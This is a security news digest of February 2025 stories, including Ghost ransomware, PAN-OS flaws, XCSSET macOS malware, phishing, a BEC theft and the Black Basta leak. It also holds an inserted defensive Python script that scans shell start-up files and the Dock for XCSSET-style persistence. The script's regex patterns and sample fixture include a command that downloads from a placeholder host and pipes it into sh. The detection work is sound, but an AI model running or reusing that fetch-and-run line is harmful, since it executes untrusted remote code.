Ghost Ransomware Targets Orgs in 70+ Countries
Article Link: https://www.darkreading.com/cyberattacks-data-breaches/ghost-ransomware-targets-orgs-70-countries
- A fast-moving ransomware group known as Ghost is tearing through networks across 70+ countries, locking up data and demanding payment since 2021.
- Security analysts report these attackers rapidly progress from initial breach to ransomware deployment, often within a single day, a speed uncommon among similar threat actors.
- Their swift operations and global presence pose a substantial threat to many sectors, with critical infrastructure, education, healthcare, and government services among their targets.
- On February 19, 2025, as part of the #StopRansomware campaign, the Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory urging organizations to update software and firmware right away, especially on systems exposed to the internet, to mitigate the vulnerabilities exploited by this group.
- CISA Advisory: https://www.cisa.gov/news-events/alerts/2025/02/19/cisa-and-partners-release-advisory-ghost-cring-ransomware
Palo Alto Networks Confirms Exploitation of Firewall Vulnerability
Article Link: https://www.securityweek.com/palo-alto-networks-confirms-exploitation-of-firewall-vulnerability/
- A newly discovered attack method is actively exploiting unpatched PAN-OS firewalls, allowing unauthorized access to system configurations and sensitive data.
- Threat actors are leveraging three distinct vulnerabilities—CVE-2025-0108, CVE-2024-9474, and CVE-2025-0111—in a multi-stage assault that bypasses authentication, escalates privileges, and extracts confidential files.
- Malicious activity linked to this exploit has been traced to multiple regions, including the U.S., Germany, and the Netherlands. The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-0108 to its list of known exploited flaws, emphasizing the severity of the threat.
- Palo Alto Networks has issued fixes as of February 12, 2025. Organizations are advised to apply the patches without delay and restrict external access to administrative interfaces to reduce exposure.
XCSSET macOS Malware Returns with First New Version Since 2022
Article Link: https://www.theregister.com/2025/02/17/macos_xcsset_malware_returns/
- A contemporary variant of the XCSSET malware has resurfaced, the first update since 2022, putting Apple developers at risk. Microsoft reports that this malware spreads through infected Xcode projects, silently compromising macOS systems.
- The latest version retains its ability to steal data from Notes, digital wallets, and other system files but now includes new stealth tactics, making it harder to detect. It also introduces updated methods to maintain access, ensuring it stays on compromised devices longer.
- Once inside, the malware alters system files to launch with every terminal session and even replaces the legitimate Launchpad app in the macOS dock, duping users into running malicious code.
- Researchers emphasize the need to thoroughly inspect Xcode projects before use, limit downloads to trusted sources, and monitor for unusual system behavior to prevent infection. Keeping macOS security settings at their highest level can also help block unauthorized changes.
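A defender-side check for the persistence behaviour described above, added here as an example and not taken from the article or Microsoft's research: it flags shell start-up lines that execute from throwaway paths or pipe a download into a shell, and Dock tiles labelled Launchpad that do not point at the system app. The start-up file list, the suspicious-path patterns, the Dock plist layout and the sample inputs are assumptions for this example.

```python
import os
import plistlib
import re

# Shell start-up files evaluated at every interactive session (zsh is the macOS default).
STARTUP_FILES = ["~/.zshrc", "~/.zshenv", "~/.zprofile", "~/.bashrc", "~/.bash_profile"]
# Paths a legitimate dotfile rarely executes from, plus download/decode-and-run one-liners (assumed patterns).
SUSPICIOUS_PATH = re.compile(r"/(private/)?tmp/|/var/folders/|/Users/Shared/")
PIPE_TO_SHELL = re.compile(r"(curl|wget)\b.*\|\s*(ba|z)?sh\b|base64\s+(-d|--decode)")
LAUNCHPAD_APP = "/System/Applications/Launchpad.app"

# Constructed sample inputs so the checks can be exercised without touching the host.
SAMPLE_ZSHRC = "export PATH=$HOME/.cargo/bin:$PATH\n# comment /tmp/ok\nsource /private/tmp/.u/env.sh\ncurl -fsSL http://example.invalid/s | sh\n"
SAMPLE_DOCK = plistlib.dumps({"persistent-apps": [{"tile-data": {"file-label": "Launchpad", "file-data": {"_CFURLString": "file:///Users/dev/.hidden/Launchpad.app/"}}}]})

def suspicious_startup_lines(text: str) -> list[str]:
    """Return non-comment lines referencing a suspicious path or piping a download to a shell."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#") and (
                SUSPICIOUS_PATH.search(stripped) or PIPE_TO_SHELL.search(stripped)):
            hits.append(stripped)
    return hits

def launchpad_tiles_not_system(plist_bytes: bytes) -> list[str]:
    """Return Dock tiles labelled 'Launchpad' whose target is not the system Launchpad app."""
    odd = []
    for tile in plistlib.loads(plist_bytes).get("persistent-apps", []):
        data = tile.get("tile-data", {})
        url = data.get("file-data", {}).get("_CFURLString", "")
        if data.get("file-label") == "Launchpad" and not url.rstrip("/").endswith(LAUNCHPAD_APP):
            odd.append(url)
    return odd

def audit_host() -> dict[str, list[str]]:
    """Run both checks against the current user's real files; empty lists mean nothing flagged."""
    findings = {}
    for name in STARTUP_FILES:
        path = os.path.expanduser(name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings[path] = suspicious_startup_lines(fh.read())
    dock = os.path.expanduser("~/Library/Preferences/com.apple.dock.plist")
    if os.path.isfile(dock):
        with open(dock, "rb") as fh:
            findings[dock] = launchpad_tiles_not_system(fh.read())
    return findings
```

Call `audit_host()` on a macOS account to check the real files; any flagged line is a lead for review against a known-good baseline, not proof of infection.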
Mobile Phishing Attacks Surge with 16% of Incidents in US
Article Link: https://www.infosecurity-magazine.com/news/mobile-phishing-attacks-surge-16/
- New research confirms that mobile phishing scams, known as “mishing,” are escalating. A Zimperium report analyzing 750,000 devices reveals that 16% of these attacks are hitting users in the United States.
- Criminals are zeroing in on mobile platforms, taking advantage of widespread smartphone use to lure victims into clicking deceptive links and entering credentials on fake login pages.
- The report shows that quishing and phishing tactics are used to evade detection and bypass built-in mobile security, exploiting weaknesses in messaging apps, email, and social media platforms to reach victims more effectively than ever before.
- Security experts urge companies to adopt mobile defense tools such as phishing-resistant multi-factor authentication (MFA), conduct user training and awareness programs, and perform real-time URL analysis.
- Zimperium Report: https://www.zimperium.com/resources/zimperium-research-exposes-surge-in-mishing-mobile-targeted-phishing-attacks/
U.S. Healthcare Org Pays $11M Settlement Over Alleged Cybersecurity Lapses
Article Link: https://www.bleepingcomputer.com/news/security/us-healthcare-org-pays-11m-settlement-over-alleged-cybersecurity-lapses/
- An $11.25 million settlement has been reached after Health Net Federal Services (HNFS) was accused of misrepresenting its adherence to security obligations under a Defense Health Agency (DHA) TRICARE contract.
- Between 2015 and 2018, HNFS allegedly failed to apply required protections while managing sensitive military healthcare data but falsely certified compliance in reports to the government.
- The settlement resolves claims under the False Claims Act, which penalizes companies for misrepresenting security compliance in government contracts. HNFS has not admitted liability but has agreed to the payout.
- The U.S. Department of Justice claims the company neglected mandated security controls such as vulnerability scanning, firewall safeguards, and access restrictions, putting military personnel and their families at possible risk. The case illustrates the need for accurate compliance reporting, frequent security assessments, and prompt action on identified risks to avoid legal consequences and financial penalties.
LockBit Crackdown Continues with Zservers Sanctions
Article Link: https://www.scworld.com/news/lockbit-crackdown-continues-with-zservers-sanctions
- The U.S., U.K., and Australia have slapped sanctions on Zservers, a Russian-based bulletproof hosting provider accused of supporting LockBit ransomware operations.
- Investigators say Zservers supplied infrastructure built to evade law enforcement, making it a go-to choice for cybercriminals. One 2022 case tied the company to a LockBit ransomware attack, when Canadian authorities traced a virtual machine running the malware to an IP address subleased from Zservers.
- These sanctions block financial dealings with Zservers and target key operators to disrupt ransomware activity. Experts warn that LockBit, which faced a series of disruptions over the past year, and similar groups will likely pivot to new web hosting services to keep their operations running.
- Officials urge companies to stay ahead of the threat by hardening network defenses, conducting frequent security audits, and staying alert to the evolving tactics used by ransomware gangs.
U.S. Minerals Company Says Crooks Broke into Email and Helped Themselves to $500K
Article Link: https://www.theregister.com/2025/02/20/niocorp_bec_scam/
- Cybercriminals infiltrated NioCorp Developments, a NASDAQ-listed U.S. minerals company, on February 14, rerouting approximately $500,000 meant for a vendor.
- Using a business email compromise (BEC) attack, the perpetrators gained access to NioCorp’s systems, including parts of its email platform, and manipulated transactions to divert the funds. After detecting the attack, NioCorp alerted financial institutions and federal law enforcement while taking steps to contain the breach and reinforce its defenses.
- NioCorp focuses on mining minerals such as niobium, scandium, and titanium and is still in its early development phase, with no revenue generated yet. The financial consequences of this breach are under review, and recovery efforts are ongoing.
- Information security specialists counsel businesses to verify payment requests and suggest organizations adopt stricter email authentication measures, perform routine system reviews, and educate employees to spot fraudulent communications before they cause harm.
Black Basta Ransomware Gang’s Internal Chat Logs Leak Online
Article Link: https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-s-internal-chat-logs-leak-online/
- An anonymous individual has leaked internal chat logs from the Black Basta ransomware group, exposing their covert operations.
- The leaker, known as ExploitWhispers, shared the data on a Telegram channel, possibly in response to Black Basta’s alleged attacks on Russian financial institutions.
- The breach provides an unfiltered look into the inner workings of a major ransomware syndicate, revealing how cybercriminals coordinate attacks, move cryptocurrency, and select victims. The leaked messages, covering September 2023 to September 2024, expose phishing tactics and financial transactions tied to their operations.
- Security professionals recommend that organizations strengthen their defenses by deploying advanced threat detection, performing routine security evaluations, and training employees to recognize phishing attempts, lowering the risk of ransomware attacks.
U.S. Soldier Pleads Guilty to AT&T and Verizon Cyberattacks, Linked to Snowflake Data Theft
- Cameron John Wagenius has agreed to plead guilty after stealing and selling confidential AT&T and Verizon phone records, a scheme linked to the 2024 Snowflake breach.
- Using the alias ‘Kiberphant0m,’ prosecutors say he infiltrated 150+ accounts, targeting AT&T, Santander, and Ticketmaster in a massive cyberattack.
- The Snowflake breach saw hackers extort over $2 million. Wagenius now faces up to 20 years in prison and $500,000 in fines.
- Information security analysts caution businesses to tighten data controls, assess their systems frequently, and monitor for suspicious activity before criminals gain access.
